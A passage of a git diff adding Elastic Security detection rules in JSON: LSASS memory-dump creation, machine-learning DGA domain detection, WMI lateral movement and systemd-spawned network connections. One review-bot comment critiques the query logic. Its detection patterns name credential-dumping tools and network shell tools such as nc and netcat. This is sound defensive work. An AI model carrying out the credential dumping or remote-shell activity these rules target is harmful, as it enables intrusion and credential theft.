Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and\n file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\"\n ) and\n file.path : (\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\MSSQL\\\\LOG\\\\SQLDmpr*.mdmp\"\n )\n ) and\n\n not (\n process.executable : \"?:\\\\Windows\\\\system32\\\\WerFault.exe\" and\n file.path : (\n \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\",\n \"?:\\\\Windows\\\\System32\\\\%LOCALAPPDATA%\\\\CrashDumps\\\\lsass.exe.*.dmp\"\n )\n )\n", + "references": [ + "https://github.com/outflanknl/Dumpert", + "https://github.com/hoangprod/AndrewSpecial" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": 
"f2f46686-6f3c-4724-bd7d-24e31c70f98f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timeline_id": "4d4c0b59-ea83-483f-b8c1-8c360ee53c5c", + "timeline_title": "Comprehensive File Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_109.json b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_109.json new file mode 100644 index 00000000000..aca304f2811 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f2f46686-6f3c-4724-bd7d-24e31c70f98f_109.json 
@@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a Local Security Authority Subsystem Service (lsass.exe) default memory dump. This may indicate a credential access attempt via trusted system utilities such as Task Manager (taskmgr.exe) and SQL Dumper (sqldumper.exe) or known pentesting tools such as Dumpert and AndrewSpecial.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "LSASS Memory Dump Creation", + "note": "## Triage and analysis\n\n### Investigating LSASS Memory Dump Creation\n\nLocal Security Authority Server Service (LSASS) is a process in Microsoft Windows operating systems that is responsible for enforcing security policy on the system. It verifies users logging on to a Windows computer or server, handles password changes, and creates access tokens.\n\nThis rule looks for the creation of memory dump files with file names compatible with credential dumping tools or that start with `lsass`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Identify the process responsible for creating the dump file.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM 
services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.action != \"deletion\" and\n file.name : (\"lsass*.dmp\", \"dumpert.dmp\", \"Andrew.dmp\", \"SQLDmpr*.mdmp\", \"Coredump.dmp\") and\n\n not (\n process.executable : (\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\SqlDumper.exe\",\n \"?:\\\\Windows\\\\System32\\\\dllhost.exe\"\n ) and\n file.path : (\n \"?:\\\\*\\\\Reporting Services\\\\Logfiles\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\Shared\\\\ErrorDumps\\\\SQLDmpr*.mdmp\",\n \"?:\\\\Program Files\\\\Microsoft SQL Server\\\\*\\\\MSSQL\\\\LOG\\\\SQLDmpr*.mdmp\"\n )\n ) and\n\n not (\n process.executable : \"?:\\\\Windows\\\\system32\\\\WerFault.exe\" and\n file.path : (\n \"?:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\lsass.exe.*.dmp\",\n \"?:\\\\Windows\\\\System32\\\\%LOCALAPPDATA%\\\\CrashDumps\\\\lsass.exe.*.dmp\"\n )\n )\n", + "references": [ + "https://github.com/outflanknl/Dumpert", + "https://github.com/hoangprod/AndrewSpecial" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": 
"f2f46686-6f3c-4724-bd7d-24e31c70f98f", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timeline_id": "4d4c0b59-ea83-483f-b8c1-8c360ee53c5c", + "timeline_title": "Comprehensive File Timeline", + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "f2f46686-6f3c-4724-bd7d-24e31c70f98f_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_3.json b/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_3.json new file mode 100644 index 00000000000..d75c188a6cc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3403393-1fd9-4686-8f6e-596c58bc00b4_3.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A supervised machine learning model has identified a DNS question name that is predicted to be the result of a Domain Generation Algorithm (DGA), which could indicate command and control network activity.", + "from": "now-10m", + "index": [ + "logs-endpoint.events.*", + "logs-network_traffic.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Machine Learning Detected a DNS Request Predicted to be a DGA Domain", + "query": "ml_is_dga.malicious_prediction:1 and not dns.question.registered_domain:avsvmcloud.com\n", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html", + "https://docs.elastic.co/en/integrations/dga", + "https://www.elastic.co/security-labs/detect-domain-generation-algorithm-activity-with-new-kibana-integration" + ], + "related_integrations": [ + { + "package": "dga", + "version": "^2.0.0" + }, + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "network_traffic", + "version": "^1.1.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dns.question.registered_domain", + "type": "keyword" + }, + { + "ecs": false, + "name": "ml_is_dga.malicious_prediction", + "type": "unknown" + } + ], + "risk_score": 21, + "rule_id": "f3403393-1fd9-4686-8f6e-596c58bc00b4", + "setup": "## Setup\n\nThe rule requires the Domain Generation Algorithm (DGA) Detection integration assets to be installed, as well as DNS events collected by integrations such as Elastic Defend, Network Packet Capture, or Packetbeat. 
\n\n### DGA Detection Setup\nThe DGA Detection integration consists of an ML-based framework to detect DGA activity in DNS events.\n\n#### Prerequisite Requirements:\n- Fleet is required for DGA Detection.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n- DNS events collected by the [Elastic Defend](https://docs.elastic.co/en/integrations/endpoint), [Network Packet Capture](https://docs.elastic.co/integrations/network_traffic) integration, or [Packetbeat](https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-overview.html).\n- To install Elastic Defend, refer to the [documentation](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n- To add the Network Packet Capture integration to an Elastic Agent policy, refer to [this](https://www.elastic.co/guide/en/fleet/current/add-integration-to-policy.html) guide.\n- To set up and run Packetbeat, follow [this](https://www.elastic.co/guide/en/beats/packetbeat/current/setting-up-and-running.html) guide.\n\n#### The following steps should be executed to install assets associated with the DGA Detection integration:\n- Go to the Kibana homepage. Under Management, click Integrations.\n- In the query bar, search for Domain Generation Algorithm Detection and select the integration to see more details about it.\n- Under Settings, click Install Domain Generation Algorithm Detection assets and follow the prompts to install the assets.\n\n#### Ingest Pipeline Setup\nBefore you can enable this rule, you'll need to enrich DNS events with predictions from the Supervised DGA Detection model. 
This is done via the ingest pipeline named `-ml_dga_ingest_pipeline` installed with the DGA Detection package.\n- If using an Elastic Beat such as Packetbeat, add the DGA ingest pipeline to it by adding a simple configuration [setting](https://www.elastic.co/guide/en/elasticsearch/reference/current/ingest.html#pipelines-for-beats) to `packetbeat.yml`.\n- If adding the DGA ingest pipeline to an existing pipeline, use a [pipeline processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html).\n\n#### Adding Custom Mappings\n- Go to the Kibana homepage. Under Management, click Stack Management.\n- Under Data click Index Management and navigate to the Component Templates tab.\n- Templates that can be edited to add custom components will be marked with a @custom suffix. Edit the @custom component template corresponding to the beat/integration you added the DGA ingest pipeline to, by pasting the following JSON blob in the \"Load JSON\" flyout:\n```\n{\n \"properties\": {\n \"ml_is_dga\": {\n \"properties\": {\n \"malicious_prediction\": {\n \"type\": \"long\"\n },\n \"malicious_probability\": {\n \"type\": \"float\"\n }\n }\n }\n }\n}\n```\n", + "severity": "low", + "tags": [ + "Domain: Network", + "Domain: Endpoint", + "Data Source: Elastic Defend", + "Use Case: Domain Generation Algorithm Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Command and Control" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1568", + "name": "Dynamic Resolution", + "reference": "https://attack.mitre.org/techniques/T1568/", + "subtechnique": [ + { + "id": "T1568.002", + "name": "Domain Generation Algorithms", + "reference": "https://attack.mitre.org/techniques/T1568/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + 
"version": 3 + }, + "id": "f3403393-1fd9-4686-8f6e-596c58bc00b4_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_109.json b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_109.json new file mode 100644 index 00000000000..bc53c70c18e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3475224-b179-4f78-8877-c2bd64c26b88_109.json 
@@ -0,0 +1,147 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies processes executed via Windows Management Instrumentation (WMI) on a remote host. This could be indicative of adversary lateral movement, but could be noisy if administrators use WMI to remotely manage hosts.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "WMI Incoming Lateral Movement", + "query": "sequence by host.id with maxspan = 2s\n\n /* Accepted Incoming RPC connection by Winmgmt service */\n\n [network where host.os.type == \"windows\" and process.name : \"svchost.exe\" and network.direction : (\"incoming\", \"ingress\") and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\" and source.port >= 49152 and destination.port >= 49152\n ]\n\n /* Excluding Common FPs Nessus and SCCM */\n\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"WmiPrvSE.exe\" and\n not (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\") and\n not user.id : (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n not process.executable :\n (\"?:\\\\Program Files\\\\HPWBEM\\\\Tools\\\\hpsum_swdiscovery.exe\",\n \"?:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\mofcomp.exe\",\n \"?:\\\\Windows\\\\Microsoft.NET\\\\Framework*\\\\csc.exe\",\n \"?:\\\\Windows\\\\System32\\\\powercfg.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"REBOOT=ReallySuppress\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\inetsrv\\\\appcmd.exe\" and process.args : \"uninstall\")\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + 
"name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "f3475224-b179-4f78-8877-c2bd64c26b88", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1047", + "name": "Windows Management Instrumentation", + "reference": "https://attack.mitre.org/techniques/T1047/" + } + ] + } + ], + "type": "eql", + "version": 109 + }, + "id": "f3475224-b179-4f78-8877-c2bd64c26b88_109", 
+ "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_1.json b/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_1.json new file mode 100644 index 00000000000..35f8d3b0977 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_1.json 
@@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious network events executed by systemd, potentially indicating persistence through a systemd backdoor. Systemd is a system and service manager for Linux operating systems, used to initialize and manage system processes. Attackers can backdoor systemd for persistence by creating or modifying systemd unit files to execute malicious scripts or commands, or by replacing legitimate systemd binaries with compromised ones, ensuring that their malicious code is automatically executed at system startup or during certain system events.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Network Connection via systemd", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and\n process.parent.name == \"systemd\" and process.name in (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\"\n )\n ] by process.entity_id\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": 
"keyword" + } + ], + "risk_score": 47, + "rule_id": "f3818c85-2207-4b51-8a28-d70fb156ee87", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Command and Control", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.002", + "name": "Systemd Service", + "reference": "https://attack.mitre.org/techniques/T1543/002/" + } + ] + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 1 + }, + "id": "f3818c85-2207-4b51-8a28-d70fb156ee87_1", + "type": "security-rule" +} \ No newline at end of file 
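Review bot: The `process.name in ("python*", "php*", ..., "lua*", ...)` clause in the query of f3818c85-…_1.json (and identically in the _2 revision) puts wildcards inside an EQL `in` list, but as far as I know `in` is an exact, case-sensitive comparison, so only a process literally named `python*` matches and `python3` does not; the `:` operator honours wildcards, e.g. `process.parent.name == "systemd" and process.name : (`. Separately, the second sequence stage joins on `process.parent.entity_id` against the first stage's `process.entity_id`, so a connection attempted by the systemd-spawned interpreter itself never completes the sequence, only one made by its child; if the interpreter's own connection is the intended signal, both stages should end in `] by process.entity_id`. The two revisions differ only in the order of the `event.type`/`event.action` terms and a `## Setup` heading, so the query behaviour is the same in both.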
diff --git a/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_2.json b/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_2.json new file mode 100644 index 00000000000..7513bfd51d8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/f3818c85-2207-4b51-8a28-d70fb156ee87_2.json 
@@ -0,0 +1,128 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious network events executed by systemd, potentially indicating persistence through a systemd backdoor. Systemd is a system and service manager for Linux operating systems, used to initialize and manage system processes. Attackers can backdoor systemd for persistence by creating or modifying systemd unit files to execute malicious scripts or commands, or by replacing legitimate systemd binaries with compromised ones, ensuring that their malicious code is automatically executed at system startup or during certain system events.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Network Connection via systemd", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.parent.name == \"systemd\" and process.name in (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\"\n )\n ] by process.entity_id\n [network where host.os.type == \"linux\" and event.action == \"connection_attempted\" and event.type == \"start\"\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": 
